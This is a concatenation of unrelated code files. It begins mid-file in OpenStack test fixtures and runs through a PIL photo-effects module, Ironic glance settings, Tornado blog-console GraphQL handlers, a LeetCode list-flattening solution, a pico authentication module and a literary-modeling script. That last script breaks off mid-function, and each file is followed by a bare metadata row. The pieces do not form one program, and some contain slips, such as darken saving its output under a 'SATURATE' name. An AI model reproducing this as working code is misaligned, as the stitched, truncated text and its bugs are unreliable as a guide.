'pool': 'pool2'}
TEST.api_floating_ips.add(generate_fip(fip_1), generate_fip(fip_2))
TEST.floating_ips.add(NetFloatingIp(generate_fip(fip_1)),
NetFloatingIp(generate_fip(fip_2)))
# Floating IP with UUID id (for Floating IP with Neutron Proxy)
fip_3 = {'id': str(uuid.uuid4()),
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_4 = {'id': str(uuid.uuid4()),
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
'pool': 'pool2'}
TEST.api_floating_ips_uuid.add(generate_fip(fip_3), generate_fip(fip_4))
TEST.floating_ips_uuid.add(NetFloatingIp(generate_fip(fip_3)),
NetFloatingIp(generate_fip(fip_4)))
# Usage
usage_vals = {"tenant_id": TEST.tenant.id,
"instance_name": server_1.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_vals))
TEST.usages.add(usage_obj)
usage_2_vals = {"tenant_id": tenant3.id,
"instance_name": server_3.name,
"flavor_name": flavor_1.name,
"flavor_vcpus": flavor_1.vcpus,
"flavor_disk": flavor_1.disk,
"flavor_ram": flavor_1.ram}
usage_obj_2 = usage.Usage(usage.UsageManager(None),
json.loads(USAGE_DATA % usage_2_vals))
TEST.usages.add(usage_obj_2)
volume_snapshot = vol_snaps.Snapshot(vol_snaps.SnapshotManager(None),
{'id': '40f3fabf-3613-4f5e-90e5-6c9a08333fc3',
'display_name': 'test snapshot',
'display_description': 'vol snap!',
'size': 40,
'status': 'available',
'volume_id': '41023e92-8008-4c8b-8059-7f2293ff3775'})
TEST.volume_snapshots.add(volume_snapshot)
cert_data = {'private_key': 'private',
'data': 'certificate_data'}
certificate = certs.Certificate(certs.CertificateManager(None), cert_data)
TEST.certs.add(certificate)
# Availability Zones
TEST.availability_zones.add(
availability_zones.AvailabilityZone(
availability_zones.AvailabilityZoneManager(None),
{'zoneName': 'nova', 'zoneState': {'available': True}}
)
)
# hypervisors
hypervisor_1 = hypervisors.Hypervisor(hypervisors.HypervisorManager(None),
{
"service": {"host": "devstack001", "id": 3},
"vcpus_used": 1,
"hypervisor_type": "QEMU",
"local_gb_used": 20,
"hypervisor_hostname": "devstack001",
"memory_mb_used": 1500,
"memory_mb": 2000,
"current_workload": 0,
"vcpus": 1,
"cpu_info": '{"vendor": "Intel", "model": "core2duo",'
'"arch": "x86_64", "features": ["lahf_lm"'
', "rdtscp"], "topology": {"cores": 1, "t'
'hreads": 1, "sockets": 1}}',
"running_vms": 1,
"free_disk_gb": 9,
"hypervisor_version": 1002000,
"disk_available_least": 6,
"local_gb": 29,
"free_ram_mb": 500,
"id": 1
}
)
TEST.hypervisors.add(hypervisor_1)
# Services
service_1 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-conductor",
"zone": "internal",
"state": "up",
"updated_at": "2013-07-08T05:21:00.000000",
"host": "devstack001",
"disabled_reason": None
}
)
service_2 = services.Service(services.ServiceManager(None),
{
"status": "enabled",
"binary": "nova-compute",
"zone": "nova",
"state": "up",
"updated_at": "2013-07-08T05:20:51.000000",
"host": "devstack001",
"disabled_reason": None
}
)
TEST.services.add(service_1)
TEST.services.add(service_2)
# Aggregates
aggregate_1 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "foo",
"availability_zone": None,
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 1,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
aggregate_2 = aggregates.Aggregate(aggregates.AggregateManager(None),
{
"name": "bar",
"availability_zone": "testing",
"deleted": 0,
"created_at": "2013-07-04T13:34:38.000000",
"updated_at": None,
"hosts": ["foo", "bar"],
"deleted_at": None,
"id": 2,
"metadata": {
"foo": "testing",
"bar": "testing"
}
}
)
TEST.aggregates.add(aggregate_1)
TEST.aggregates.add(aggregate_2)
| apache-2.0 | 3,151,234,665,979,034,000 | 37.476844 | 79 | 0.471113 | false | 3.967457 | true | false | false |
andela-ggikera/photo-editing-app | editor/photo_effects.py | 1 | 3217 | """Define imports."""
from PIL import ImageFilter, ImageOps, ImageEnhance
def grayscale(image, name, temp_url):
"""Return an image with a contrast of grey."""
image.seek(0)
photo = ImageOps.grayscale(image)
photo.save(temp_url + "GRAYSCALE" + name)
return temp_url + "GRAYSCALE" + name
def smooth(image, name, temp_url):
"""Return a smoothened image."""
image.seek(0)
photo = image.filter(ImageFilter.SMOOTH)
photo.save(temp_url + "SMOOTH" + name)
return temp_url + "SMOOTH" + name
def contour(image, name, temp_url):
"""Return an image with a contour filter."""
image.seek(0)
photo = image.filter(ImageFilter.CONTOUR)
photo.save(temp_url + "CONTOUR" + name)
return temp_url + "CONTOUR" + name
def sharpen(image, name, temp_url):
"""Return a sharpened image."""
image.seek(0)
photo = image.filter(ImageFilter.SHARPEN)
photo.save(temp_url + "SHARPEN" + name)
return temp_url + "SHARPEN" + name
def detail(image, name, temp_url):
"""Return an image with edge enhancement."""
image.seek(0)
photo = image.filter(ImageFilter.EDGE_ENHANCE)
photo.save(temp_url + "DETAIL" + name)
return temp_url + "DETAIL" + name
def flip(image, name, temp_url):
"""Flip an image."""
image.seek(0)
photo = ImageOps.flip(image)
photo.save(temp_url + "FLIP" + name)
return temp_url + "FLIP" + name
def invert(image, name, temp_url):
"""Invert an image."""
image.seek(0)
photo = ImageOps.invert(image)
photo.save(temp_url + "INVERT" + name)
return temp_url + "INVERT" + name
def mirror(image, name, temp_url):
"""Flip the image horizontally."""
image.seek(0)
photo = ImageOps.mirror(image)
photo.save(temp_url + "MIRROR" + name)
return temp_url + "MIRROR" + name
def contrast(image, name, temp_url):
"""Increase the contrast of an image and return the enhanced image."""
image.seek(0)
photo = ImageEnhance.Contrast(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "CONTRAST" + name)
return temp_url + "CONTRAST" + name
def blur(image, name, temp_url):
"""Return a blur image using a gaussian blur filter."""
image.seek(0)
photo = image.filter(
ImageFilter.GaussianBlur(radius=3))
photo.save(temp_url + "BLUR" + name)
return temp_url + "BLUR" + name
def brighten(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 1.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(1.5)
photo.save(temp_url + "BRIGHTEN" + name)
return temp_url + "BRIGHTEN" + name
def darken(image, name, temp_url):
"""Return an image with a brightness enhancement factor of 0.5."""
image.seek(0)
photo = ImageEnhance.Brightness(image)
photo = photo.enhance(0.5)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
def saturate(image, name, temp_url):
"""Return an image with a saturation enhancement factor of 2.0 ."""
image.seek(0)
photo = ImageEnhance.Color(image)
photo = photo.enhance(2.0)
photo.save(temp_url + "SATURATE" + name)
return temp_url + "SATURATE" + name
| mit | 837,746,076,482,372,200 | 27.981982 | 74 | 0.646254 | false | 3.081418 | false | false | false |
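# Illustrative usage sketch (not part of the editor source above): each helper
# takes an open PIL image, the original file name and a temp directory, saves
# the processed copy as <EFFECT><name> in that directory and returns the new
# path.  Assuming blur() above is in scope; the paths below are hypothetical:
from PIL import Image

image = Image.open('uploads/cat.jpg')
preview_path = blur(image, 'cat.jpg', '/tmp/previews/')
print(preview_path)  # -> /tmp/previews/BLURcat.jpg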
ramineni/myironic | ironic/common/image_service.py | 1 | 2467 | # Copyright 2010 OpenStack Foundation
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo.utils import importutils
from oslo_config import cfg
glance_opts = [
cfg.StrOpt('glance_host',
default='$my_ip',
help='Default glance hostname or IP address.'),
cfg.IntOpt('glance_port',
default=9292,
help='Default glance port.'),
cfg.StrOpt('glance_protocol',
default='http',
help='Default protocol to use when connecting to glance. '
'Set to https for SSL.'),
cfg.ListOpt('glance_api_servers',
help='A list of the glance api servers available to ironic. '
'Prefix with https:// for SSL-based glance API servers. '
'Format is [hostname|IP]:port.'),
cfg.BoolOpt('glance_api_insecure',
default=False,
help='Allow to perform insecure SSL (https) requests to '
'glance.'),
cfg.IntOpt('glance_num_retries',
default=0,
help='Number of retries when downloading an image from '
'glance.'),
cfg.StrOpt('auth_strategy',
default='keystone',
               help='Authentication strategy to use when connecting to '
                    'glance.'),
]
CONF = cfg.CONF
CONF.register_opts(glance_opts, group='glance')
def import_versioned_module(version, submodule=None):
module = 'ironic.common.glance_service.v%s' % version
if submodule:
module = '.'.join((module, submodule))
return importutils.try_import(module)
def Service(client=None, version=1, context=None):
module = import_versioned_module(version, 'image_service')
service_class = getattr(module, 'GlanceImageService')
return service_class(client, version, context)
| apache-2.0 | -1,234,819,432,871,128,000 | 36.378788 | 78 | 0.633158 | false | 4.32049 | false | false | false |
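# Illustrative sketch (not part of the ironic source above): Service() simply
# maps a version number to a dotted module path, imports it with oslo's
# try_import and instantiates its GlanceImageService.  A rough standalone
# analogue of the version-to-module mapping:
def _versioned_module_name(version, submodule=None):
    module = 'ironic.common.glance_service.v%s' % version
    return '.'.join((module, submodule)) if submodule else module

assert _versioned_module_name(1, 'image_service') == \
    'ironic.common.glance_service.v1.image_service'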
nuanri/hiblog | src/app/blog/console_views.py | 1 | 17946 | # coding: utf-8
import json
import requests
from hanlder import RequestHandler as BaseRequestHandler
import tornado.web
from tornado.web import authenticated
from ..utils import deal_errors, get_local_time, get_local_time_string
from .forms import BlogWriterForm, BlogCatalogWriterForm
class RequestHandler(BaseRequestHandler):
def q(self, query_string, query_variables=None,headers=None, api_url=None):
if not (headers and isinstance(headers, dict)):
headers = {}
if query_variables is None:
query_variables = {}
sid = self.get_secure_cookie('SID')
if api_url:
url = "http://127.0.0.1:3000" + api_url
else:
url = "http://127.0.0.1:3000/console/graphql"
if sid:
if 'Authorization' not in headers:
headers['Authorization'] = 'OOC ' + sid.decode()
s = requests.Session()
r = s.post(url, json={"query": query_string, "variables": query_variables}, headers=headers)
return r.json()
class ApiHandler(RequestHandler):
def post(self, URL):
body = self.request.body.decode()
body = json.loads(body)
# query_string = self.get_argument('query', "")
query_string = body["query"]
variables = body.get("variables", None)
# print("variables==>",variables)
r = self.q(query_string, variables, api_url=URL)
self.write(r)
# console: blog article section begins
class ConsoleBlogdexHandler(RequestHandler):
BLOG_LIST_QUERY = '''
query Blogs(
$first: Int
$sort_by: String
$sort_direction: String
){
blog{id,...F1}
}
fragment F1 on BlogApi{
articles(
first: $first,
sort_by: $sort_by,
sort_direction: $sort_direction
) {
edges {
node {
id
title
body
body_markup
updated
uid
is_public
catalog {
name
}
}
}
pageInfo {
hasPreviousPage
startCursor
endCursor
hasNextPage
}
}
}'''
@authenticated
def get(self):
# print("current_user=",self.current_user.username)
bloglist_query_variables = {
"first": 12,
"sort_by": "updated",
"sort_direction": "desc",
}
bloglist_query_variables = json.dumps(bloglist_query_variables)
r = self.q(self.BLOG_LIST_QUERY, bloglist_query_variables)
# print("index==>roooo",r)
blog_list = r.get("data").get("blog").get("articles").get("edges")
        self.render('blog/console/blog_articles.html', blog_list=blog_list, get_local_time=get_local_time)
class BlogWriterHandler(RequestHandler):
BLOG_WRITER_QUERY='''
mutation BlogArticleNew(
$input_0: BlogArticleNewInput!
) {
blog_article_new(input: $input_0) {
article {
id
title
abstract
body
body_markup
is_public
uid
catalog{
uid
}
}
}
}'''
BLOG_CATALOG_LIST_QUERY = '''
query BlogCatalogs{
blog{id,...F1}
}
fragment F1 on BlogApi{
catalogs {
name
summary
body_html
created
updated
uid
public_article_count
private_article_count
}
}'''
def get_catalogs(self):
r = self.q(self.BLOG_CATALOG_LIST_QUERY)
catalog_list = r.get("data").get("blog").get("catalogs")
return catalog_list
@authenticated
def get(self):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
self.render("blog/console/blog_writer.html", form=form, catalog_list=catalog_list)
@authenticated
def post(self):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
if not form.validate():
error = form.errors
tag_list = []
tag_uid = form.tags.data.split(",")[::2]
tag_name = form.tags.data.split(",")[1::2]
for u,n in zip(tag_uid, tag_name):
tag_list.append((u,n))
return self.render("blog/console/blog_writer.html", form=form,
catalog_list=catalog_list, error=error,tag_list=tag_list)
blogwriter_query_variables = {
"input_0":
{
"title": "",
"clientMutationId": "1",
"abstract": "",
"body": "",
"is_public": False,
"catalog_uid": "",
"tags": "",
}
}
blogwriter_query_variables["input_0"]["is_public"] = form.is_public.data
blogwriter_query_variables["input_0"]["title"] = form.title.data
blogwriter_query_variables["input_0"]["abstract"] = form.abstract.data
blogwriter_query_variables["input_0"]["body"] = form.body.data
blogwriter_query_variables["input_0"]["catalog_uid"] = form.catalog_uid.data
blogwriter_query_variables["input_0"]["tags"] = form.tags.data.split(",")[::2]
# print("form.tags.data==>",form.tags.data)
blogwriter_query_variables = json.dumps(blogwriter_query_variables)
r = self.q(self.BLOG_WRITER_QUERY, blogwriter_query_variables)
if r.get("errors"):
errors = r.get("errors")
error = deal_errors(errors)
tag_list = []
tag_uid = form.tags.data.split(",")[::2]
tag_name = form.tags.data.split(",")[1::2]
for u,n in zip(tag_uid, tag_name):
tag_list.append((u,n))
self.render("blog/console/blog_writer.html", form=form,
catalog_list=catalog_list, error=error, tag_list=tag_list)
UID = r.get("data").get("blog_article_new").get("article")["uid"]
self.redirect("/console/blog/article/" + UID)
class BlogShowHandler(RequestHandler):
BLOG_SHOW_QUERY = '''
query Blog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
article: article_u (
uid: $uid
) {
title
body: body_html
is_public
uid
catalog {
name
}
tags {
uid
name
}
}
}
'''
@authenticated
def get(self, UID):
blogshow_query_variables = {
"uid": UID,
}
blogshow_query_variables = json.dumps(blogshow_query_variables)
r = self.q(self.BLOG_SHOW_QUERY, blogshow_query_variables)
# print('r--->',r)
blog = r.get("data").get("blog").get("article")
self.render('blog/console/blog_show.html', blog=blog)
class BlogEditHandler(RequestHandler):
BLOG_EDIT_QUERY = '''
mutation MyMutation(
$input: BlogArticleEditInput!
) {
blog_article_edit(input: $input) {
article {
id
title
}
}
}'''
BLOG_SHOW_QUERY = '''
query Blog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
article: article_u (
uid: $uid
) {
title
body
abstract
is_public
catalog {
name
uid
}
tags {
uid
name
}
}
}'''
BLOG_CATALOG_LIST_QUERY = '''
query BlogCatalogs{
blog{id,...F1}
}
fragment F1 on BlogApi{
catalogs {
name
summary
body_html
created
updated
uid
public_article_count
private_article_count
}
}'''
def get_catalogs(self):
r = self.q(self.BLOG_CATALOG_LIST_QUERY)
catalog_list = r.get("data").get("blog").get("catalogs")
return catalog_list
@authenticated
def get(self, UID):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
blogshow_query_variables = {
"uid": UID,
}
blogshow_query_variables = json.dumps(blogshow_query_variables)
r = self.q(self.BLOG_SHOW_QUERY, blogshow_query_variables)
blog = r.get("data").get("blog").get("article")
# print("blog==>",blog)
self.render("blog/console/blog_edit.html",
form=form, blog=blog, catalog_list=catalog_list)
@authenticated
def post(self, UID):
form = BlogWriterForm(self)
catalog_list = self.get_catalogs()
blogshow_query_variables = {
"uid": UID,
}
        blogshow_query_variables = json.dumps(blogshow_query_variables)
        r = self.q(self.BLOG_SHOW_QUERY, blogshow_query_variables)
blog = r.get("data").get("blog").get("article")
if not form.validate():
error = form.errors
# tag_list = []
# tag_uid = form.tags.data.split(",")[::2]
# tag_name = form.tags.data.split(",")[1::2]
# for u,n in zip(tag_uid, tag_name):
# tag_list.append((u,n))
return self.render("blog/console/blog_edit.html",
form=form,blog=blog,
catalog_list=catalog_list,
error = error)
blogedit_query_variables = {
"input": {
"clientMutationId": "1",
"uid": "",
"title": "",
"abstract": "",
"body": "",
"is_public": "",
"catalog_uid": "",
"tags": ""
}
}
blogedit_query_variables["input"]["is_public"] = form.is_public.data
blogedit_query_variables["input"]["uid"] = UID
blogedit_query_variables["input"]["title"] = form.title.data
blogedit_query_variables["input"]["abstract"] = form.abstract.data
blogedit_query_variables["input"]["body"] = form.body.data
blogedit_query_variables["input"]["catalog_uid"] = form.catalog_uid.data
blogedit_query_variables["input"]["tags"] = form.tags.data.split(",")[::2]
blogedit_query_variables = json.dumps(blogedit_query_variables)
r = self.q(self.BLOG_EDIT_QUERY, blogedit_query_variables)
self.redirect("/console/blog/article/" + UID)
class BlogDelHandler(RequestHandler):
BLOG_DEL_QUERY = '''
mutation MyMutaion (
$input_0: BlogArticleDeleteInput!
) {
blog_article_delete(input: $input_0) {
status
message
}
}'''
@authenticated
def get(self, UID):
blogdel_query_variables = {
"input_0": {
"clientMutationId": "1",
"uid": ""
}
}
blogdel_query_variables["input_0"]["uid"] = UID
blogdel_query_variables = json.dumps(blogdel_query_variables)
r = self.q(self.BLOG_DEL_QUERY, blogdel_query_variables)
# print("status===>",r)
status = r.get("data").get("blog_article_delete").get('status')
self.redirect("/console/blog/article")
# End of the console article section
# Start of the console catalog section
class BlogCatalogindexHandler(RequestHandler):
BLOG_CATALOG_LIST_QUERY = '''
query BlogCatalogs{
blog{id,...F1}
}
fragment F1 on BlogApi{
catalogs {
name
summary
body_html
created
updated
uid
public_article_count
private_article_count
}
}'''
@authenticated
def get(self):
r = self.q(self.BLOG_CATALOG_LIST_QUERY)
catalog_list = r.get("data").get("blog").get("catalogs")
self.render('/blog/console/catalogs.html',
catalog_list=catalog_list,
get_local_time_string=get_local_time_string )
class BlogCatalogWriterHandler(RequestHandler):
pass
#
# BLOG_CATALOG_WRITER_QUERY='''
# mutation BlogCatalogNew(
# $input_0: BlogCatalogNewInput!
# ) {
# blog_catalog_new(input: $input_0) {
# catalog {
# uid
# body_html
# name
# public_article_count
# private_article_count
# created
# updated
# }
# }
# }'''
#
# @authenticated
# def get(self):
# form = BlogCatalogWriterForm(self)
# self.render("blog/console/catalog_writer.html")
#
# @authenticated
# def post(self):
# form = BlogCatalogWriterForm(self)
# if not form.validate():
# error = form.errors
# # print("error==>",error)
# return self.render("blog/console/catalog_writer.html",
# form=form, error=error)
#
# catalogwriter_query_variables = {
# "input_0":
# {
# "clientMutationId": "1",
# "name": "",
# "summary": "",
# "body": "",
# }
# }
#
# catalogwriter_query_variables["input_0"]["name"] = form.name.data
# catalogwriter_query_variables["input_0"]["summary"] = form.summary.data
# catalogwriter_query_variables["input_0"]["body"] = form.body.data
#
# r = self.q(self.BLOG_CATALOG_WRITER_QUERY, catalogwriter_query_variables)
# # print("r===>",r)
# if r.get("errors"):
# errors = r.get("errors")
# error = deal_errors(errors)
# self.render("blog/console/catalog_writer.html",
# form=form, error=error)
#
# UID = r.get("data").get("blog_catalog_new").get("catalog")["uid"]
# self.redirect("/console/blog/catalog/" + UID)
class BlogCatalogShowHandler(RequestHandler):
CATALOG_SHOW_QUERY = '''
query BlogCatalog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
catalog: catalog_u(
uid: $uid
) {
body
name
summary
public_article_count
private_article_count
created
updated
uid
}
}'''
@authenticated
def get(self, UID):
catalogshow_query_variables = {
"uid": UID,
}
catalogshow_query_variables = json.dumps(catalogshow_query_variables)
r = self.q(self.CATALOG_SHOW_QUERY, catalogshow_query_variables)
catalog = r.get("data").get("blog").get("catalog")
self.render("blog/console/catalog_show.html", catalog=catalog, get_local_time_string=get_local_time_string )
class BlogCatalogEditHandler(RequestHandler):
CATALOG_EDIT_QUERY = '''
mutation MyMutation(
$input: BlogCatalogEditInput!
) {
blog_catalog_edit(input: $input) {
catalog {
id
uid
name
}
}
}'''
CATALOG_SHOW_QUERY = '''
query BlogCatalog(
$uid: String!
){
blog{id,...F1}
}
fragment F1 on BlogApi{
catalog: catalog_u(
uid: $uid
) {
body
name
summary
public_article_count
private_article_count
created
updated
}
}'''
@authenticated
def get(self, UID):
form = BlogCatalogWriterForm(self)
catalog_query_variables = {
"uid": UID,
}
catalog_query_variables = json.dumps(catalog_query_variables)
r = self.q(self.CATALOG_SHOW_QUERY, catalog_query_variables)
catalog = r.get("data").get("blog").get("catalog")
self.render("blog/console/catalog_edit.html", form=form, catalog=catalog)
@authenticated
def post(self, UID):
form = BlogCatalogWriterForm(self)
if not form.validate():
return self.render("blog/console/catalog_edit.html", form=form)
catalogedit_query_variables = {
"input": {
"clientMutationId": "1",
"uid": "",
"name": "",
"summary": "",
"body": ""
}
}
catalogedit_query_variables["input"]["uid"] = UID
catalogedit_query_variables["input"]["name"] = form.name.data
catalogedit_query_variables["input"]["summary"] = form.summary.data
catalogedit_query_variables["input"]["body"] = form.body.data
catalogedit_query_variables = json.dumps(catalogedit_query_variables)
r = self.q(self.CATALOG_EDIT_QUERY, catalogedit_query_variables)
self.redirect("/console/blog/catalog/" + UID)
class BlogCatalogDelHander(RequestHandler):
CATA_DEL_QUERY = '''
mutation MyMutation(
$input: BlogCatalogDeleteInput!
) {
blog_catalog_delete(input: $input) {
status
message
}
}'''
@authenticated
def get(self, UID):
catalogdel_query_variables = {
"input": {
"clientMutationId": "1",
"uid": ""
}
}
catalogdel_query_variables["input"]["uid"] = UID
catalogdel_query_variables = json.dumps(catalogdel_query_variables)
r = self.q(self.CATA_DEL_QUERY, catalogdel_query_variables)
del_info = r.get("data").get("blog_catalog_delete")
status = del_info.get("status")
error = del_info.get("message")
current_url = self.request.uri
back_url = "/console/blog/catalog"
if not status:
self.render("/error.html", error=error, current_url=current_url,
back_url=back_url)
self.redirect("/console/blog/catalog")
# End of the console catalog section
# Start of the console tag section
class BlogTagindexHandler(RequestHandler):
BLOG_TAG_LIST_QUERY = '''
query BlogTags(
$first: Int
$sort_by: String
$sort_direction: String
){
blog{id,...F1}
}
fragment F1 on BlogApi{
tags(
first: $first,
sort_by: $sort_by,
sort_direction: $sort_direction
) {
edges {
node {
id
name
summary
body
count
created
updated
uid
}
}
pageInfo {
hasPreviousPage
startCursor
endCursor
hasNextPage
}
}
}'''
@authenticated
def get(self):
r = self.q(self.BLOG_TAG_LIST_QUERY)
tag_list = r.get("data").get("blog").get("tags").get("edges")
self.render('/blog/console/tags.html',
tag_list=tag_list,
get_local_time_string=get_local_time_string)
# End of the console tag section
| mit | 4,445,130,281,428,235,300 | 25.143275 | 116 | 0.546919 | false | 3.626445 | false | false | false |
saisankargochhayat/algo_quest | leetcode/430.FlatternADoubleLinkedList/soln.py | 1 | 1710 | """
# Definition for a Node.
class Node:
def __init__(self, val, prev, next, child):
self.val = val
self.prev = prev
self.next = next
self.child = child
"""
class Solution:
def flatten(self, head: 'Node') -> 'Node':
start = head
head = head
while head != None:
# we dont need to anything in this case.
if head.child is None:
head = head.next
else:
# Flatten the list here.
head = self.flattenChildList(head, head.child, head.next)
# self.checkAnswer(start)
return start
# def checkAnswer(self, head):
# while head:
# print(head.val, head.prev)
# head = head.next
    # Flattening step: the source node's next points to the head of the child list, and the
    # child's prev points back to the source node. The child list's tail points to nextNode,
    # and nextNode's prev points to that tail.
    # One sneaky catch - if nextNode is None, return the tail of the flattened child list instead.
def flattenChildList(self, sourceNode, childNode, nextNode):
head = childNode
sourceNode.next = childNode
sourceNode.child = None
childNode.prev = sourceNode
while head != None:
# End of the child list.
if head.next == None:
head.next = nextNode
if nextNode is None:
return head
nextNode.prev = head
return nextNode
elif head.child is None:
head = head.next
else:
head = self.flattenChildList(head, head.child, head.next)
return nextNode
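# Illustrative usage sketch (not part of the original submission): builds a tiny
# multilevel list by hand, assuming a minimal Node class equivalent to the
# commented-out LeetCode definition above, then flattens it.
if __name__ == "__main__":
    class Node:
        def __init__(self, val, prev=None, next=None, child=None):
            self.val, self.prev, self.next, self.child = val, prev, next, child
    a, b, c = Node(1), Node(2), Node(3)
    a.next, b.prev = b, a      # main list: 1 <-> 2
    b.child = c                # node 2 carries the child list: 3
    head = Solution().flatten(a)
    while head:                # expected traversal order: 1, 2, 3
        print(head.val)
        head = head.next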
| apache-2.0 | 319,589,736,364,629,700 | 32.529412 | 106 | 0.533918 | false | 4.407216 | false | false | false |
AdiPersonalWorks/ATOS_GOM_SystemPrototyping | pico/auth.py | 1 | 1890 | import pico
from pico import PicoError
class NotAuthorizedError(PicoError):
def __init__(self, message=''):
PicoError.__init__(self, message)
self.response.status = "401 Not Authorized"
self.response.set_header("WWW-Authenticate", "Basic")
class InvalidSessionError(PicoError):
def __init__(self, message=''):
PicoError.__init__(self, message)
self.response.status = "440 Invalid Session"
class Bunch:
def __init__(self, **kwds):
self.__dict__.update(kwds)
class object(pico.object):
account_manager = None
__headers__ = {'X-SESSION-ID': ''}
def __init__(self):
super(object, self).__init__()
self.user = None
if type(self.account_manager) == dict:
self.account_manager = Bunch(**self.account_manager)
request = pico.get_request()
if 'HTTP_AUTHORIZATION' in request:
try:
auth_header = request.get('HTTP_AUTHORIZATION')
scheme, data = auth_header.split(None, 1)
assert(scheme == 'Basic')
username, password = data.decode('base64').split(':', 1)
self.user = self._get_user(username, password)
except Exception, e:
raise NotAuthorizedError(str(e))
elif 'HTTP_X_SESSION_ID' in request:
session_id = request.get('HTTP_X_SESSION_ID')
self.user = self._get_session(session_id)
elif 'DUMMY_REQUEST' in request:
pass
else:
raise NotAuthorizedError("No username or password supplied")
def _get_user(self, username, password):
if self.account_manager:
return self.account_manager._get_user(username, password)
def _get_session(self, session_id):
if self.account_manager:
return self.account_manager._get_session(session_id)
| mit | 5,647,580,370,093,337,000 | 32.75 | 72 | 0.589947 | false | 3.970588 | false | false | false |
tedunderwood/horizon | chapter3/code/reproduce_fictional_prestige.py | 1 | 7078 | #!/usr/bin/env python3
# reproduce_fictional_prestige.py
# Scripts to reproduce models
# used in Chapter Three,
# The Directions of Literary Change.
import csv, os, sys, pickle, math
# we add a path to be searched so that we can import
# versatiletrainer, which will do most of the work
# Versatiletrainer, and the modules it will in turn call,
# are publicly available in this github repo:
# https://github.com/tedunderwood/overlappingcategories
# mental note: when you file the book repo with Zenodo,
# a copy of the overlappingcategories repo also needs to
# be frozen
sys.path.append('/Users/tunder/Dropbox/python/logistic')
import versatiletrainer as train
import pandas as pd
# sourcefolder =
# extension =
# metadatapath =
# outputpath = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/predictions.csv'
def genre_gridsearch(metadatapath, modelname, c_range, ftstart, ftend, ftstep, positive_tags = ['elite'], negative_tags = ['vulgar'], excl_below = 1700, excl_above = 2000):
# Function does a gridsearch to identify an optimal number of features and setting of
# the regularization constant; then produces that model.
# sourcefolder = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/fromEF/'
sourcefolder = '../sourcefiles/'
extension = '.tsv'
#metadatapath = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/prestigeficmeta.csv'
vocabpath = '/Users/tunder/Dropbox/fiction/lexicon/' + modelname + '.txt'
if os.path.exists(vocabpath):
print('Vocabulary for ' + modelname + ' already exists. Using it.')
outputpath = '../results/' + modelname + '.csv'
# We can simply exclude volumes from consideration on the basis on any
# metadata category we want, using the dictionaries defined below.
## EXCLUSIONS.
excludeif = dict()
excludeifnot = dict()
excludeabove = dict()
excludebelow = dict()
excludebelow['firstpub'] = excl_below
excludeabove['firstpub'] = excl_above
sizecap = 700
# CLASSIFY CONDITIONS
# print()
# print("You can also specify positive tags to be excluded from training, and/or a pair")
# print("of integer dates outside of which vols should be excluded from training.")
# print("If you add 'donotmatch' to the list of tags, these volumes will not be")
# print("matched with corresponding negative volumes.")
# print()
# ## testphrase = input("Comma-separated list of such tags: ")
testphrase = ''
testconditions = set([x.strip() for x in testphrase.split(',') if len(x) > 0])
datetype = "firstpub"
numfeatures = ftend
regularization = .000075
# linting the code would get rid of regularization, which is at this
# point an unused dummy parameter
paths = (sourcefolder, extension, metadatapath, outputpath, vocabpath)
exclusions = (excludeif, excludeifnot, excludebelow, excludeabove, sizecap)
classifyconditions = (positive_tags, negative_tags, datetype, numfeatures, regularization, testconditions)
modelparams = 'logistic', 12, ftstart, ftend, ftstep, c_range
matrix, rawaccuracy, allvolumes, coefficientuples = train.tune_a_model(paths, exclusions, classifyconditions, modelparams)
print('If we divide the dataset with a horizontal line at 0.5, accuracy is: ', str(rawaccuracy))
tiltaccuracy = train.diachronic_tilt(allvolumes, 'linear', [])
print("Divided with a line fit to the data trend, it's ", str(tiltaccuracy))
def applymodel(modelpath, metadatapath, outpath):
sourcefolder = '/Users/tunder/Dropbox/GenreProject/python/reception/fiction/fromEF'
extension = '.tsv'
newmetadict = train.apply_pickled_model(modelpath, sourcefolder, extension, metadatapath)
print('Got predictions for that model.')
newmetadict.to_csv(outpath)
def comparison(selfmodel, othermodel, modelname):
totalvolumes = 0
right = 0
for v in selfmodel.index:
realgenre = selfmodel.loc[v, 'realclass']
v = str(v)
otherprediction = othermodel.loc[v, modelname]
if realgenre > .5 and otherprediction > 0.5:
right += 1
elif realgenre < .5 and otherprediction < 0.5:
right += 1
totalvolumes +=1
return totalvolumes, right
def getacc(filelist):
allofem = 0
allright = 0
for afile in filelist:
df = pd.read_csv(afile)
totalcount = len(df.realclass)
tp = sum((df.realclass > 0.5) & (df.logistic > 0.5))
tn = sum((df.realclass <= 0.5) & (df.logistic <= 0.5))
fp = sum((df.realclass <= 0.5) & (df.logistic > 0.5))
